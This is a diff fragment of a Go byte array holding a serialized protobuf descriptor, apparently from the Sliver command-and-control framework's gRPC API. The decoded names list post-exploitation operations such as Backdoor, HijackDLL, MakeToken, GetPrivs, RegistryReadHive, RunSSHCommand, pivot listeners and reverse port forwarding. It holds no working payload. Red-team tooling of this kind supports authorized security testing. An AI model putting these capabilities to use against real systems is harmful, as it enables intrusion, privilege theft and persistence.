- 0x74, 0x70, 0x62, 0x2e, 0x42, 0x61, 0x63, 0x6b, 0x64, 0x6f, 0x6f, 0x72, 0x52, 0x65, 0x71, 0x1a,
- 0x12, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x42, 0x61, 0x63, 0x6b, 0x64,
- 0x6f, 0x6f, 0x72, 0x12, 0x41, 0x0a, 0x0c, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x52,
- 0x65, 0x61, 0x64, 0x12, 0x19, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52,
- 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x52, 0x65, 0x61, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x16,
+ 0x73, 0x68, 0x6f, 0x74, 0x12, 0x50, 0x0a, 0x11, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x54,
+ 0x6f, 0x6b, 0x65, 0x6e, 0x4f, 0x77, 0x6e, 0x65, 0x72, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76,
+ 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x54, 0x6f, 0x6b, 0x65,
+ 0x6e, 0x4f, 0x77, 0x6e, 0x65, 0x72, 0x52, 0x65, 0x71, 0x1a, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76,
+ 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x54, 0x6f, 0x6b, 0x65,
+ 0x6e, 0x4f, 0x77, 0x6e, 0x65, 0x72, 0x12, 0x35, 0x0a, 0x08, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63,
+ 0x65, 0x73, 0x12, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65,
+ 0x72, 0x76, 0x69, 0x63, 0x65, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76,
+ 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x73, 0x12, 0x44, 0x0a,
+ 0x0d, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x44, 0x65, 0x74, 0x61, 0x69, 0x6c, 0x12, 0x1a,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63,
+ 0x65, 0x44, 0x65, 0x74, 0x61, 0x69, 0x6c, 0x52, 0x65, 0x71, 0x1a, 0x17, 0x2e, 0x73, 0x6c, 0x69,
+ 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x44, 0x65, 0x74,
+ 0x61, 0x69, 0x6c, 0x12, 0x4c, 0x0a, 0x12, 0x53, 0x74, 0x61, 0x72, 0x74, 0x53, 0x65, 0x72, 0x76,
+ 0x69, 0x63, 0x65, 0x42, 0x79, 0x4e, 0x61, 0x6d, 0x65, 0x12, 0x1f, 0x2e, 0x73, 0x6c, 0x69, 0x76,
+ 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x74, 0x61, 0x72, 0x74, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63,
+ 0x65, 0x42, 0x79, 0x4e, 0x61, 0x6d, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69,
+ 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x49, 0x6e, 0x66,
+ 0x6f, 0x12, 0x4e, 0x0a, 0x12, 0x50, 0x69, 0x76, 0x6f, 0x74, 0x53, 0x74, 0x61, 0x72, 0x74, 0x4c,
+ 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x12, 0x1f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x50, 0x69, 0x76, 0x6f, 0x74, 0x53, 0x74, 0x61, 0x72, 0x74, 0x4c, 0x69, 0x73,
+ 0x74, 0x65, 0x6e, 0x65, 0x72, 0x52, 0x65, 0x71, 0x1a, 0x17, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x76, 0x6f, 0x74, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65,
+ 0x72, 0x12, 0x44, 0x0a, 0x11, 0x50, 0x69, 0x76, 0x6f, 0x74, 0x53, 0x74, 0x6f, 0x70, 0x4c, 0x69,
+ 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x50, 0x69, 0x76, 0x6f, 0x74, 0x53, 0x74, 0x6f, 0x70, 0x4c, 0x69, 0x73, 0x74, 0x65,
+ 0x6e, 0x65, 0x72, 0x52, 0x65, 0x71, 0x1a, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70,
+ 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x12, 0x4e, 0x0a, 0x15, 0x50, 0x69, 0x76, 0x6f, 0x74,
+ 0x53, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x73,
+ 0x12, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x76, 0x6f,
+ 0x74, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x18, 0x2e,
+ 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x76, 0x6f, 0x74, 0x4c, 0x69,
+ 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x73, 0x12, 0x33, 0x0a, 0x0a, 0x50, 0x69, 0x76, 0x6f, 0x74,
+ 0x47, 0x72, 0x61, 0x70, 0x68, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62,
+ 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x14, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70,
+ 0x62, 0x2e, 0x50, 0x69, 0x76, 0x6f, 0x74, 0x47, 0x72, 0x61, 0x70, 0x68, 0x12, 0x40, 0x0a, 0x0c,
+ 0x53, 0x74, 0x61, 0x72, 0x74, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x12, 0x19, 0x2e, 0x73,
+ 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x74, 0x61, 0x72, 0x74, 0x53, 0x65, 0x72,
+ 0x76, 0x69, 0x63, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x49, 0x6e, 0x66, 0x6f, 0x12, 0x3e,
+ 0x0a, 0x0b, 0x53, 0x74, 0x6f, 0x70, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x12, 0x18, 0x2e,
+ 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x74, 0x6f, 0x70, 0x53, 0x65, 0x72,
+ 0x76, 0x69, 0x63, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x49, 0x6e, 0x66, 0x6f, 0x12, 0x42,
+ 0x0a, 0x0d, 0x52, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x12,
+ 0x1a, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x6d, 0x6f, 0x76,
+ 0x65, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x15, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x49, 0x6e,
+ 0x66, 0x6f, 0x12, 0x38, 0x0a, 0x09, 0x4d, 0x61, 0x6b, 0x65, 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x12,
+ 0x16, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x61, 0x6b, 0x65, 0x54,
+ 0x6f, 0x6b, 0x65, 0x6e, 0x52, 0x65, 0x71, 0x1a, 0x13, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x4d, 0x61, 0x6b, 0x65, 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x12, 0x2d, 0x0a, 0x06,
+ 0x47, 0x65, 0x74, 0x45, 0x6e, 0x76, 0x12, 0x10, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x45, 0x6e, 0x76, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x45, 0x6e, 0x76, 0x49, 0x6e, 0x66, 0x6f, 0x12, 0x2f, 0x0a, 0x06, 0x53,
+ 0x65, 0x74, 0x45, 0x6e, 0x76, 0x12, 0x13, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
+ 0x2e, 0x53, 0x65, 0x74, 0x45, 0x6e, 0x76, 0x52, 0x65, 0x71, 0x1a, 0x10, 0x2e, 0x73, 0x6c, 0x69,
+ 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65, 0x74, 0x45, 0x6e, 0x76, 0x12, 0x35, 0x0a, 0x08,
+ 0x55, 0x6e, 0x73, 0x65, 0x74, 0x45, 0x6e, 0x76, 0x12, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x55, 0x6e, 0x73, 0x65, 0x74, 0x45, 0x6e, 0x76, 0x52, 0x65, 0x71, 0x1a,
+ 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x55, 0x6e, 0x73, 0x65, 0x74,
+ 0x45, 0x6e, 0x76, 0x12, 0x35, 0x0a, 0x08, 0x42, 0x61, 0x63, 0x6b, 0x64, 0x6f, 0x6f, 0x72, 0x12,
+ 0x15, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x42, 0x61, 0x63, 0x6b, 0x64,
+ 0x6f, 0x6f, 0x72, 0x52, 0x65, 0x71, 0x1a, 0x12, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70,
+ 0x62, 0x2e, 0x42, 0x61, 0x63, 0x6b, 0x64, 0x6f, 0x6f, 0x72, 0x12, 0x41, 0x0a, 0x0c, 0x52, 0x65,
+ 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x52, 0x65, 0x61, 0x64, 0x12, 0x19, 0x2e, 0x73, 0x6c, 0x69,
+ 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x52, 0x65,
+ 0x61, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x16, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
+ 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x52, 0x65, 0x61, 0x64, 0x12, 0x44, 0x0a,
+ 0x0d, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x57, 0x72, 0x69, 0x74, 0x65, 0x12, 0x1a,
0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74,
- 0x72, 0x79, 0x52, 0x65, 0x61, 0x64, 0x12, 0x44, 0x0a, 0x0d, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74,
- 0x72, 0x79, 0x57, 0x72, 0x69, 0x74, 0x65, 0x12, 0x1a, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x57, 0x72, 0x69, 0x74, 0x65,
- 0x52, 0x65, 0x71, 0x1a, 0x17, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52,
- 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x57, 0x72, 0x69, 0x74, 0x65, 0x12, 0x50, 0x0a, 0x11,
- 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x4b, 0x65,
- 0x79, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67,
- 0x69, 0x73, 0x74, 0x72, 0x79, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x4b, 0x65, 0x79, 0x52, 0x65,
- 0x71, 0x1a, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67,
- 0x69, 0x73, 0x74, 0x72, 0x79, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x4b, 0x65, 0x79, 0x12, 0x50,
- 0x0a, 0x11, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65,
- 0x4b, 0x65, 0x79, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52,
- 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x4b, 0x65, 0x79,
- 0x52, 0x65, 0x71, 0x1a, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52,
- 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x4b, 0x65, 0x79,
- 0x12, 0x54, 0x0a, 0x13, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x4c, 0x69, 0x73, 0x74,
- 0x53, 0x75, 0x62, 0x4b, 0x65, 0x79, 0x73, 0x12, 0x1f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x53, 0x75, 0x62, 0x4b, 0x65,
- 0x79, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x1a, 0x1c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x53, 0x75, 0x62, 0x4b,
- 0x65, 0x79, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x53, 0x0a, 0x12, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74,
- 0x72, 0x79, 0x4c, 0x69, 0x73, 0x74, 0x56, 0x61, 0x6c, 0x75, 0x65, 0x73, 0x12, 0x1f, 0x2e, 0x73,
- 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79,
- 0x4c, 0x69, 0x73, 0x74, 0x56, 0x61, 0x6c, 0x75, 0x65, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x1c, 0x2e,
- 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72,
- 0x79, 0x56, 0x61, 0x6c, 0x75, 0x65, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x4d, 0x0a, 0x10, 0x52,
- 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x52, 0x65, 0x61, 0x64, 0x48, 0x69, 0x76, 0x65, 0x12,
- 0x1d, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73,
- 0x74, 0x72, 0x79, 0x52, 0x65, 0x61, 0x64, 0x48, 0x69, 0x76, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x1a,
+ 0x72, 0x79, 0x57, 0x72, 0x69, 0x74, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x17, 0x2e, 0x73, 0x6c, 0x69,
+ 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x57, 0x72,
+ 0x69, 0x74, 0x65, 0x12, 0x50, 0x0a, 0x11, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x43,
+ 0x72, 0x65, 0x61, 0x74, 0x65, 0x4b, 0x65, 0x79, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x43, 0x72, 0x65, 0x61,
+ 0x74, 0x65, 0x4b, 0x65, 0x79, 0x52, 0x65, 0x71, 0x1a, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x43, 0x72, 0x65, 0x61,
+ 0x74, 0x65, 0x4b, 0x65, 0x79, 0x12, 0x50, 0x0a, 0x11, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72,
+ 0x79, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x4b, 0x65, 0x79, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69,
+ 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x44, 0x65,
+ 0x6c, 0x65, 0x74, 0x65, 0x4b, 0x65, 0x79, 0x52, 0x65, 0x71, 0x1a, 0x1b, 0x2e, 0x73, 0x6c, 0x69,
+ 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x44, 0x65,
+ 0x6c, 0x65, 0x74, 0x65, 0x4b, 0x65, 0x79, 0x12, 0x54, 0x0a, 0x13, 0x52, 0x65, 0x67, 0x69, 0x73,
+ 0x74, 0x72, 0x79, 0x4c, 0x69, 0x73, 0x74, 0x53, 0x75, 0x62, 0x4b, 0x65, 0x79, 0x73, 0x12, 0x1f,
0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74,
- 0x72, 0x79, 0x52, 0x65, 0x61, 0x64, 0x48, 0x69, 0x76, 0x65, 0x12, 0x3e, 0x0a, 0x0d, 0x52, 0x75,
- 0x6e, 0x53, 0x53, 0x48, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x12, 0x17, 0x2e, 0x73, 0x6c,
+ 0x72, 0x79, 0x53, 0x75, 0x62, 0x4b, 0x65, 0x79, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x1a,
+ 0x1c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73,
+ 0x74, 0x72, 0x79, 0x53, 0x75, 0x62, 0x4b, 0x65, 0x79, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x53, 0x0a,
+ 0x12, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x4c, 0x69, 0x73, 0x74, 0x56, 0x61, 0x6c,
+ 0x75, 0x65, 0x73, 0x12, 0x1f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52,
+ 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x4c, 0x69, 0x73, 0x74, 0x56, 0x61, 0x6c, 0x75, 0x65,
+ 0x73, 0x52, 0x65, 0x71, 0x1a, 0x1c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
+ 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x56, 0x61, 0x6c, 0x75, 0x65, 0x73, 0x4c, 0x69,
+ 0x73, 0x74, 0x12, 0x4d, 0x0a, 0x10, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x52, 0x65,
+ 0x61, 0x64, 0x48, 0x69, 0x76, 0x65, 0x12, 0x1d, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x52, 0x65, 0x61, 0x64, 0x48, 0x69,
+ 0x76, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x1a, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
+ 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x72, 0x79, 0x52, 0x65, 0x61, 0x64, 0x48, 0x69, 0x76,
+ 0x65, 0x12, 0x3e, 0x0a, 0x0d, 0x52, 0x75, 0x6e, 0x53, 0x53, 0x48, 0x43, 0x6f, 0x6d, 0x6d, 0x61,
+ 0x6e, 0x64, 0x12, 0x17, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x53,
+ 0x48, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x14, 0x2e, 0x73, 0x6c,
0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x53, 0x48, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e,
- 0x64, 0x52, 0x65, 0x71, 0x1a, 0x14, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x53, 0x53, 0x48, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x12, 0x38, 0x0a, 0x09, 0x48, 0x69,
- 0x6a, 0x61, 0x63, 0x6b, 0x44, 0x4c, 0x4c, 0x12, 0x16, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74,
- 0x70, 0x62, 0x2e, 0x44, 0x6c, 0x6c, 0x48, 0x69, 0x6a, 0x61, 0x63, 0x6b, 0x52, 0x65, 0x71, 0x1a,
- 0x13, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x44, 0x6c, 0x6c, 0x48, 0x69,
- 0x6a, 0x61, 0x63, 0x6b, 0x12, 0x35, 0x0a, 0x08, 0x47, 0x65, 0x74, 0x50, 0x72, 0x69, 0x76, 0x73,
- 0x12, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x47, 0x65, 0x74, 0x50,
- 0x72, 0x69, 0x76, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x47, 0x65, 0x74, 0x50, 0x72, 0x69, 0x76, 0x73, 0x12, 0x57, 0x0a, 0x15, 0x53,
- 0x74, 0x61, 0x72, 0x74, 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64, 0x4c, 0x69, 0x73, 0x74,
- 0x65, 0x6e, 0x65, 0x72, 0x12, 0x22, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64, 0x53, 0x74, 0x61, 0x72, 0x74, 0x4c, 0x69, 0x73,
- 0x74, 0x65, 0x6e, 0x65, 0x72, 0x52, 0x65, 0x71, 0x1a, 0x1a, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64, 0x4c, 0x69, 0x73, 0x74,
- 0x65, 0x6e, 0x65, 0x72, 0x12, 0x53, 0x0a, 0x14, 0x47, 0x65, 0x74, 0x52, 0x70, 0x6f, 0x72, 0x74,
- 0x46, 0x77, 0x64, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x73, 0x12, 0x1e, 0x2e, 0x73,
- 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64,
- 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x1b, 0x2e, 0x73,
- 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64,
- 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x73, 0x12, 0x55, 0x0a, 0x14, 0x53, 0x74, 0x6f,
- 0x70, 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65,
- 0x72, 0x12, 0x21, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x70, 0x6f,
- 0x72, 0x74, 0x46, 0x77, 0x64, 0x53, 0x74, 0x6f, 0x70, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65,
- 0x72, 0x52, 0x65, 0x71, 0x1a, 0x1a, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72,
- 0x12, 0x3b, 0x0a, 0x0b, 0x4f, 0x70, 0x65, 0x6e, 0x53, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x12,
- 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x6e, 0x53,
- 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
- 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x6e, 0x53, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x37, 0x0a,
- 0x0c, 0x43, 0x6c, 0x6f, 0x73, 0x65, 0x53, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x16, 0x2e,
- 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x6c, 0x6f, 0x73, 0x65, 0x53, 0x65,
- 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x1a, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62,
- 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x12, 0x50, 0x0a, 0x11, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74,
- 0x65, 0x72, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x1e, 0x2e, 0x73, 0x6c,
